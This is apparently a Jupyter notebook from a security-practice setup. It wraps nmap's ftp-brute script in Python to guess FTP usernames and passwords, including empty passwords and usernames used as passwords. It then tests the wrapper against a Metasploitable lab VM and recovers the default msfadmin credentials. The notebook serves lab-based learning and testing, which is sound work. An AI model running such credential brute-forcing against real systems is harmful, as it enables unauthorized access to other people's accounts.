# Modules

In [3]:
import argparse, sys, threading, time
from datetime import datetime
from itertools import chain, product
from ftplib import FTP
import nmap
import pandas as pd
import ast
import pprint
pp = pprint.PrettyPrinter(indent=1)

# Functions

## FTP Brute Login Function

In [4]:
def ftp_brute(ipaddress,userdb=None,passdb=None):
    if userdb == None:
        userdb = '/usr/share/nmap/nselib/data/usernames.lst' #pass the default lists if none is supplied
    if passdb == None:
        passdb = '/usr/share/nmap/nselib/data/passwords.lst' #default passwords list
    scanner = nmap.PortScanner()
    targets = []
    #ftp-brute will attempt a guess for every password in the passdb list for each username
    #userdb/passdb is used to supply my own password list or the default will be used 
    #brute.emptypass=True will attempt empty passwords
    #username as passwords guessing is on by default. Supply an empty passdb list and only this will be executed
    scan1 = scanner.scan(hosts=ipaddress, arguments=f'''
        --script ftp-brute
        --script-args=userdb={userdb},passdb={passdb},brute.emptypass=True
        -d -v -T5 -p 21
        ''')#scan for ftp vulns using the scripts and attach associated arguments for them as needed
#     scan1 = scanner.scan(hosts=ipaddress, arguments='--script ftp-bounce --script-args=ftp-bounce.password= ,ftp-bounce.checkhost=127.0.0.1 -p 21')#scan for ftp vulns using the scripts and attach associated arguments for them as needed
    xml = scanner.get_nmap_last_output()    #GET XML OUTPUT
    try:
        df1 = pd.DataFrame(scan1)
        a = scanner.command_line()
        b = scanner.scaninfo()
        c = scanner.scanstats()
        d = scanner.all_hosts() #gets ip address
        s = scan1['scan']

        f = [d[0],a,b,c,s] #Add any values and then add a column name for it inside the columns 
        df2 = pd.DataFrame([f], columns=['IP','cmdLine','scaninfo','scanStats','scanData']) #make df of the d list holding the ip address to append to my df
    #EXTRACT THE SCANDATA FIELDS AND PRINT IT
        cmdline = df2['cmdLine'][0]
        scaninfo = df2['scaninfo'][0]
        hostnames = df2['scanData'][0][d[0]]['hostnames']
        addresses = df2['scanData'][0][d[0]]['addresses']
        vendor = df2['scanData'][0][d[0]]['vendor']
        status = df2['scanData'][0][d[0]]['status']
        print("Elapsed Time:",df2['scanStats'][0]['elapsed']) #You can still pull keys out from the stored DF data even!
        print(f"IP/MAC: {addresses}")
        print(f"status: {status}")
        print(f"vendor: {vendor}")
        print(f"Hostnames: {hostnames}")
        print(f"{d}")
        print(f"command: {cmdline}\nscaninfo: {scaninfo}")
        return df1,df2,xml #returning three variables in form of a tuple 
    except Exception as e:
        print(e)
        

## View scan data Function

In [5]:

def ftp_vuln_data(df):
#CHECK FTP SCAN DATA
    ip = df['IP'][0] #pulls the ip used in the scan
    a = df['scanData'][0][ip]["tcp"][21]
    #Get only the FTP script Data
#     b = df['scanData'][0][ip]["tcp"][21]['script'] #displays 
    print('\n')
    pp.pprint(a)
#     print(f"{a}\n\n{b}")

# Metasploitable Tests

In [6]:
!cat '/root/AttackScripts/usernames2.lst' #contains the one username for metasploitable
!cat '/root/AttackScripts/passwords0.lst' #empty list

msfadmin


In [14]:
#TESTING AGAINST METASPLOITABLE BOX TO VERIFY SCRIPTS WORK
host = '192.168.1.143'
userdb = '/root/AttackScripts/usernames2.lst' #test list against metasploitable for msfadmin acct
no_passwords = '/root/AttackScripts/passwords0.lst' #just an empty list to attempt guesses for usernames and usernames as the passwords
df1_d,df2_d,xml_d = ftp_brute(host,userdb,no_passwords)#supply host and the usernames list file i want to use

Elapsed Time: 0.87
IP/MAC: {'ipv4': '192.168.1.143', 'mac': '00:0C:29:99:F5:12'}
status: {'state': 'up', 'reason': 'arp-response'}
vendor: {'00:0C:29:99:F5:12': 'VMware'}
Hostnames: [{'name': '', 'type': ''}]
['192.168.1.143']
command: nmap -oX - --script ftp-brute --script-args=userdb=/root/AttackScripts/usernames2.lst,passdb=/root/AttackScripts/passwords0.lst,brute.emptypass=True -d -v -T5 -p 21 192.168.1.143
scaninfo: {'tcp': {'method': 'syn', 'services': '21'}}


In [15]:
#Read data from the scans
ftp_vuln_data(df2_d)



{'conf': '3',
 'cpe': '',
 'extrainfo': '',
 'name': 'ftp',
 'product': '',
 'reason': 'syn-ack',
 'script': {'ftp-brute': '\n'
                         '  Accounts: \n'
                         '    msfadmin:msfadmin - Valid credentials\n'
                         '  Statistics: Performed 1 guesses in 1 seconds, '
                         'average tps: 1.0'},
 'state': 'open',
 'version': ''}
